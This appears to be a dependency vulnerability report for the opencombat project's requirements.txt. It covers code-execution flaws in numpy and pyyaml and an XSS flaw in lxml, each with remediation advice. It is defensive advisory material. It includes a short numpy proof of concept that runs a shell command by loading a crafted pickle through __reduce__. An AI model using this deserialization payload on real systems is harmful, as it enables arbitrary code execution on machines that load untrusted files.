buxx/opencombat:requirements.txt

Vulnerabilities 3 via 3 paths
Dependencies 20
Source GitHub
Commit 97a8c0ff

high severity

Arbitrary Code Execution

  • Vulnerable module: numpy
  • Introduced through: numpy@1.13.3

Detailed paths

  • Introduced through: buxx/opencombat@buxx/opencombat#97a8c0ffd82e31c96e4a0ad607c42f6d9ff0ad1b numpy@1.13.3

Overview

numpy is a fundamental package needed for scientific computing with Python.

Affected versions of this package are vulnerable to Arbitrary Code Execution. It uses the pickle Python module unsafely, which allows remote attackers to execute arbitrary code via a crafted serialized object, as demonstrated by a numpy.load call.

PoC by nanshihui:

import numpy
from numpy import __version__
print(__version__)
import os
import pickle

class Test(object):
    def __init__(self):
        self.a = 1

    # __reduce__ tells pickle how to rebuild the object on load: it returns a
    # callable and its arguments, which unpickling invokes, so loading the
    # file runs os.system('ls').
    def __reduce__(self):
        return (os.system, ('ls',))

tmpdaa = Test()
with open("a-file.pickle", 'wb') as f:
    pickle.dump(tmpdaa, f)
# numpy.load falls back to pickle for a file that is not .npy/.npz,
# so this call deserializes the object and triggers __reduce__.
numpy.load('a-file.pickle')

Remediation

There is no fixed version for numpy.

high severity

Arbitrary Code Execution

  • Vulnerable module: pyyaml
  • Introduced through: pyyaml@3.12

Detailed paths

  • Introduced through: buxx/opencombat@buxx/opencombat#97a8c0ffd82e31c96e4a0ad607c42f6d9ff0ad1b pyyaml@3.12

Overview

PyYAML is a YAML parser and emitter for Python.

Affected versions of this package are vulnerable to Arbitrary Code Execution due to using the insecure yaml.load() function.

Remediation

Upgrade pyyaml to version 4.1 or higher.

medium severity

Cross-site Scripting (XSS)

  • Vulnerable module: lxml
  • Introduced through: lxml@4.2.1

Detailed paths

  • Introduced through: buxx/opencombat@buxx/opencombat#97a8c0ffd82e31c96e4a0ad607c42f6d9ff0ad1b lxml@4.2.1

Overview

lxml is a Pythonic, mature binding for the libxml2 and libxslt libraries.

Affected versions of this package are vulnerable to Cross-site Scripting (XSS) attacks. Due to improper escaping, an attacker could perform an XSS attack in Internet Explorer.

Details

Cross-Site Scripting (XSS) attacks occur when an attacker tricks a user’s browser into executing malicious JavaScript code in the context of a victim’s domain. Such scripts can steal the user’s session cookies for the domain, scrape or modify its content, and perform or modify actions on the user’s behalf, actions typically blocked by the browser’s Same Origin Policy.

These attacks are possible by escaping the context of the web application and injecting malicious scripts into an otherwise trusted website. These scripts can introduce additional attributes (say, a "new" option in a dropdown list or a new link to a malicious site) and can potentially execute code on the client side, unbeknownst to the victim. This occurs when characters like < > " ' are not escaped properly.

There are a few types of XSS:

  • Persistent XSS is an attack in which the malicious code persists into the web app’s database.
  • Reflected XSS is an attack in which the website echoes back a portion of the request. The attacker needs to trick the user into clicking a malicious link (for instance through a phishing email or malicious JS on another page), which triggers the XSS attack.
  • DOM-based XSS is an attack that occurs purely in the browser when client-side JavaScript echoes back a portion of the URL onto the page. DOM-based XSS is notoriously hard to detect, as the server never gets a chance to see the attack taking place.

Remediation

Upgrade lxml to version 4.2.5 or higher.